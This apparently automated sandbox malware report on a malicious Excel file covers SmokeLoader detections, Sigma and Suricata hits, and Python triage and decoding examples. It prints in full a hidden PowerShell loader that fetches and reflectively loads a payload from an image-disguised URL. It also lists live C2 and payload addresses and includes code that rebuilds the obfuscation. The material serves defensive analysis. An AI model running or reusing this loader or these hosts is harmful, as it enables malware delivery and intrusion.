? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
            Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3416, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" , ProcessId: 4052, ProcessName: wscript.exe
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3416, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
            Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3692, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
            Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2984, TargetFilename: C:\Users\user\AppData\Local\Temp\t1fwdssb.xrn.ps1
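            The process, network and file entries above are Sigma matches on the sandbox's event stream: Excel spawning wscript.exe, Excel and EQNEDT32.EXE initiating connections, PowerShell started with an execution-policy bypass that downloads and reflectively loads an assembly, and taskeng.exe launching a binary out of AppData\Roaming. The Python triage below is an added example, not Joe Sandbox or Sigma code: each predicate is a paraphrase of what the corresponding entry flags, not the published rule's logic, and the events are constructed from values shown in this report. PIDs 4052, 3416, 1216 and 2984 are the report's; pairing 2984 with the loader command line, the EQNEDT32.EXE PID 3100, the second wscript.exe PID 3520, the dropped-file path and the notepad.exe control event are assumptions.

```python
"""Rule-based triage of Sysmon-style events (EventID 1 process, 3 network, 11 file)
for the behaviours this report flags. Added example; rules paraphrase the report,
events are constructed from its values (see comments for what is assumed)."""
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}


def _name(path):
    """Case-folded image name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev):
    return (ev["type"] == "process" and _name(ev["ParentImage"]) in OFFICE_PARENTS
            and _name(ev["Image"]) in SCRIPT_HOSTS)


def office_app_network_connect(ev):
    return (ev["type"] == "network" and ev["Initiated"]
            and _name(ev["Image"]) in OFFICE_APPS)


def eqnedt32_network_connect(ev):
    # Equation Editor has no legitimate reason to open a socket.
    return ev["type"] == "network" and _name(ev["Image"]) == "eqnedt32.exe"


def eqnedt32_file_dropped(ev):
    return ev["type"] == "file" and _name(ev["Image"]) == "eqnedt32.exe"


def powershell_execution_policy_bypass(ev):
    # -ep bypass, -exec bypass, -executionpolicy bypass (case-insensitive)
    return (ev["type"] == "process" and _name(ev["Image"]) == "powershell.exe"
            and re.search(r"-e(?:p|x\w*)\s+bypass", ev["CommandLine"], re.I) is not None)


def powershell_download_and_load(ev):
    # download + base64 decode + in-memory assembly load in one command line
    if ev["type"] != "process" or _name(ev["Image"]) != "powershell.exe":
        return False
    c = ev["CommandLine"].lower()
    return (("downloaddata(" in c or "downloadstring(" in c)
            and "frombase64string(" in c
            and "[system.reflection.assembly]::load(" in c)


def task_runs_appdata_binary(ev):
    # scheduled task (taskeng.exe on Windows 7) starting a binary from the roaming profile
    return (ev["type"] == "process" and _name(ev["ParentImage"]) == "taskeng.exe"
            and "\\appdata\\roaming\\" in ev["Image"].lower())


RULES = [office_spawns_script_host, office_app_network_connect, eqnedt32_network_connect,
         eqnedt32_file_dropped, powershell_execution_policy_bypass,
         powershell_download_and_load, task_runs_appdata_binary]


def triage(events):
    """Map each rule that fired to the ProcessIds of the events that triggered it."""
    hits = {}
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.setdefault(rule.__name__, []).append(ev["ProcessId"])
    return hits


PS_LOADER = (  # abridged from the PowerShell command line in this report
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -windowstyle hidden '
    '-executionpolicy bypass -NoProfile -command "$imageUrl = \'https://ia803104.us.archive.org/'
    '27/items/vbs_20240726_20240726/vbs.jpg\';$webClient = New-Object System.Net.WebClient;'
    '$imageBytes = $webClient.DownloadData($imageUrl);'
    '$commandBytes = [System.Convert]::FromBase64String($base64Command);'
    '$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes)"'
)
EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"

EVENTS = [  # constructed from the report; PIDs 3100, 3520, 5000 and the drop path are made up
    {"type": "process", "ProcessId": 4052, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"',
     "ParentImage": EXCEL},
    {"type": "process", "ProcessId": 2984, "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": PS_LOADER, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"type": "network", "ProcessId": 3416, "Image": EXCEL, "Initiated": True,
     "DestinationIp": "208.64.171.230", "DestinationPort": 443},
    {"type": "network", "ProcessId": 3100, "Image": EQNEDT32, "Initiated": True,
     "DestinationIp": "23.94.148.16", "DestinationPort": 80},
    {"type": "process", "ProcessId": 3520, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": "wscript.exe", "ParentImage": EQNEDT32},
    {"type": "file", "ProcessId": 3100, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\constructed_drop.vbs"},
    {"type": "process", "ProcessId": 1216, "Image": r"C:\Users\user\AppData\Roaming\dagifhd",
     "CommandLine": r"C:\Users\user\AppData\Roaming\dagifhd", "ParentImage": r"C:\Windows\System32\taskeng.exe"},
    {"type": "process", "ProcessId": 5000, "Image": r"C:\Windows\System32\notepad.exe",  # benign control
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rule, pids in sorted(triage(EVENTS).items()):
        print(f"{rule:36s} {pids}")
```

            The two EQNEDT32.EXE rules are the most specific here and need no allow-listing, since Equation Editor never opens sockets or writes files on its own; Office-to-script-host and PowerShell bypass hits do occur in legitimate automation and should be tuned against a baseline before alerting on them.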

            Data Obfuscation

            Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8
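            The Data Obfuscation entry above shows the two-stage loader. The parent PowerShell decodes a `$Codigo` string that is UTF-16LE text, base64-encoded, with every `A` swapped for a placeholder this report renders as `? ? ? ? ?` (compare the value's start `J? ? ? ? ?Bp` with `JABp`, the UTF-16LE base64 of `$i`). The child downloads a file served as vbs.jpg, cuts the base64 between `<<BASE64_START>>` and `<<BASE64_END>>`, loads it with `[System.Reflection.Assembly]::Load` and calls `dnlib.IO.Home.VAI` with a backwards-written URL as the first argument. The Python below is an added example, not the sample's code or Joe Sandbox's: it reverses each layer, inferring the placeholder from the encoded `$`, and parses the Invoke arguments. The placeholder value and the carrier file are constructed; reversing the first argument yields http://23.94.148.16/90/WEFV.txt, the host EQNEDT32.EXE is seen contacting on port 80 in the Exploits section.

```python
"""Layer-by-layer decode of the PowerShell loader chain in this report.
Added example. STAGE2 is the sample's own script as quoted in the report;
the placeholder token and the carrier 'image' are constructed."""
import base64
import re

STAGE2 = (
    "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';"
    "$webClient = New-Object System.Net.WebClient;"
    "$imageBytes = $webClient.DownloadData($imageUrl);"
    "$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);"
    "$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';"
    "$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);"
    "$startIndex -ge 0 -and $endIndex -gt $startIndex;"
    "$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;"
    "$base64Command = $imageText.Substring($startIndex, $base64Length);"
    "$commandBytes = [System.Convert]::FromBase64String($base64Command);"
    "$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);"
    "$type = $loadedAssembly.GetType('dnlib.IO.Home');"
    "$method = $type.GetMethod('VAI').Invoke($null, [object[]] "
    "('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
)

# The real token substituted for 'A' is not recoverable from the report (it renders
# as '? ? ? ? ?'); this value is an assumption used only to build test input.
ASSUMED_PLACEHOLDER = "\u00a1\u00a1\u00a1"


def obfuscate_stage1(script, placeholder):
    """Rebuild a $Codigo value the way the report implies: UTF-16LE, base64,
    then every 'A' replaced by the placeholder. Used to produce input."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", placeholder)


def infer_placeholder(codigo):
    """'$' + an ASCII letter always encodes to 'J','A','B',... in UTF-16LE base64,
    so the token is whatever sits between the leading 'J' and the next 'B'."""
    if not codigo.startswith("J"):
        raise ValueError("stage-1 blob does not start with an encoded '$'")
    return codigo[1:codigo.index("B", 1)]


def decode_stage1(codigo, placeholder=None):
    """Undo the substitution and the UTF-16LE base64 layer."""
    token = placeholder or infer_placeholder(codigo)
    return base64.b64decode(codigo.replace(token, "A")).decode("utf-16-le")


def extract_marker_payload(carrier, start="<<BASE64_START>>", end="<<BASE64_END>>"):
    """Stage 2 in Python: locate the markers in the text view of the 'image' and
    decode the base64 between them (the sample uses IndexOf/Substring)."""
    text = carrier.decode("utf-8", errors="replace")  # UTF8.GetString also substitutes bad bytes
    s, e = text.find(start), text.find(end)
    if s < 0 or e <= s:
        raise ValueError("markers not found")
    return base64.b64decode(text[s + len(start):e])


def build_carrier(payload):
    """Constructed stand-in for vbs.jpg: non-image junk around the marked base64."""
    return (b"\xff\xd8\xff\xe0constructed-not-a-real-jpeg\x00\x01"
            + b"<<BASE64_START>>" + base64.b64encode(payload)
            + b"<<BASE64_END>>" + b"\x00trailer")


def loader_invocation(stage2):
    """Pull the reflective entry point and its argument list out of the script."""
    type_name = re.search(r"GetType\('([^']*)'\)", stage2).group(1)
    method = re.search(r"GetMethod\('([^']*)'\)", stage2).group(1)
    arglist = re.search(r"\[object\[\]\]\s*\((.*)\)\)\s*$", stage2).group(1)
    return type_name, method, re.findall(r"'([^']*)'", arglist)


def unreverse(s):
    """First Invoke argument: the next-stage URL written backwards."""
    return s[::-1]


if __name__ == "__main__":
    codigo = obfuscate_stage1(STAGE2, ASSUMED_PLACEHOLDER)
    t, m, args = loader_invocation(decode_stage1(codigo))
    print(t, m, unreverse(args[0]), args[1:])
    print(extract_marker_payload(build_carrier(b"MZ-constructed-stub")))
```

            Two points worth noting. The sample's `$startIndex -ge 0 -and $endIndex -gt $startIndex;` only evaluates a boolean and never branches on it, so a carrier without markers makes `Substring` throw rather than abort cleanly; the Python version raises explicitly. `infer_placeholder` depends on the stage-2 script starting with `$` followed by an ASCII letter; for a blob that starts differently, pass the token explicitly.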
            IDS alerts (Suricata)

            Timestamp                        SID      Severity  Source port  Destination port  Protocol  Classtype
            2024-08-31T15:51:50.730698+0200  2039103  1         49174        80                TCP       A Network Trojan was detected
            2024-08-31T15:51:45.412770+0200  2039103  1         49173        80                TCP       A Network Trojan was detected
            2024-08-31T15:51:45.746647+0200  2829848  2         80           49173             TCP       Potentially Bad Traffic
            2024-08-31T15:51:21.432233+0200  2049038  1         443          49171             TCP       A Network Trojan was detected


            AV Detection

            Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg | URL Reputation: Label: malware
            Source: http://prolinice.ga/index.php | Avira URL Cloud: Label: malware
            Source: http://vilendar.ga/index.php | Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{21E9ADCA-4DF6-4ACD-96FE-092206FC804F}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EADD419E.doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
            Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
            Source: prolinice.ga | Virustotal: Detection: 15%
            Source: http://vilendar.ga/index.php | Virustotal: Detection: 16%
            Source: http://prolinice.ga/index.php | Virustotal: Detection: 18%
            Source: http://prolinice.ga/ | Virustotal: Detection: 15%
            Source: 40830001.xls | ReversingLabs: Detection: 26%
            Source: 40830001.xls | Virustotal: Detection: 9%
            Source: 40830001.xls | Joe Sandbox ML: detected
            Source: C:\Windows\explorer.exe | Code function: 15_2_02805174 CryptAcquireContextA,15_2_02805174
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,19_2_000C3098
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,19_2_000C3717
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C3E04 RtlCompareMemory,CryptUnprotectData,19_2_000C3E04
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C1198 CryptBinaryToStringA,CryptBinaryToStringA,19_2_000C1198
